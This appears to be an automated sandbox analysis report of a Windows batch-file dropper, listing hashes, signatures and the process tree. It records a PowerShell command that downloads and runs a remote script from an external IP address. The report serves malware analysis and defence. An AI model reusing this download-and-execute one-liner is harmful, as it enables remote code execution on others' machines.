Analysis
max time kernel: 61s
max time network: 112s
platform: windows10_x64
resource: win10
submitted: 31-07-2020 23:10
Static task: static1
Behavioral task: behavioral1
  Sample: 9de315693c64bdae451a94b7fba94cd7.bat
  Resource: win7v200722 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 9de315693c64bdae451a94b7fba94cd7.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 9de315693c64bdae451a94b7fba94cd7.bat
Size: 216B
MD5: 326e8645188851fa741312cfd98964c4
SHA1: fc88590aa93e65b6d4604f18df31aeb7c78cffd4
SHA256: 5f5d0072bf19dad6f7d88f7b7487e08d4a689d9b26d5cf265d54d049a1ae9788
SHA512: e3a8666cf03291ceeaae820553a8b10a474ec611503e7e89f21a4ecfdfb3233fa4c9908b6eb07bf0ecddd9e6785d5e2d74545faa5747a4ddda877484fa872e1f
Score: 10/10
Malware Config
Extracted
  Language | Source      | URLs
  ps1      | ps1.dropper | http://185.103.242.78/pastes/9de315693c64bdae451a94b7fba94cd7
Signatures
Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  description                          | pid  | process | target process
  PID 3892 wrote to memory of 3852     | 3892 | cmd.exe | powershell.exe
  (this entry appears 3 times)
Program crash (1 IoC)
  Processes:
  pid | pid_target | process      | target process
  972 | 3852       | WerFault.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description               | pid | process
  Token: SeRestorePrivilege | 972 | WerFault.exe
  Token: SeBackupPrivilege  | 972 | WerFault.exe
  Token: SeDebugPrivilege   | 972 | WerFault.exe
Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes:
  pid | process
  972 | WerFault.exe
  (this entry appears 13 times)
ServiceHost packer (6 IoCs)
Detects ServiceHost packer used for .NET malware
  Processes:
  resource                                                  | yara_rule
  behavioral2/memory/3852-2-0x0000000000000000-mapping.dmp  | servicehost
  behavioral2/memory/3852-3-0x0000000000000000-mapping.dmp  | servicehost
  behavioral2/memory/3852-4-0x0000000000000000-mapping.dmp  | servicehost
  behavioral2/memory/3852-5-0x0000000000000000-mapping.dmp  | servicehost
  behavioral2/memory/3852-6-0x0000000000000000-mapping.dmp  | servicehost
  behavioral2/memory/3852-7-0x0000000000000000-mapping.dmp  | servicehost
Processes
C:\Windows\system32\cmd.exe (PID 3892)
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9de315693c64bdae451a94b7fba94cd7.bat"
  signatures: Suspicious use of WriteProcessMemory
  |
  +-- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3852)
      command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9de315693c64bdae451a94b7fba94cd7');Invoke-TRGIQEFKG;Start-Sleep -s 10000"
      |
      +-- C:\Windows\SysWOW64\WerFault.exe (PID 972)
          command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 704
          signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses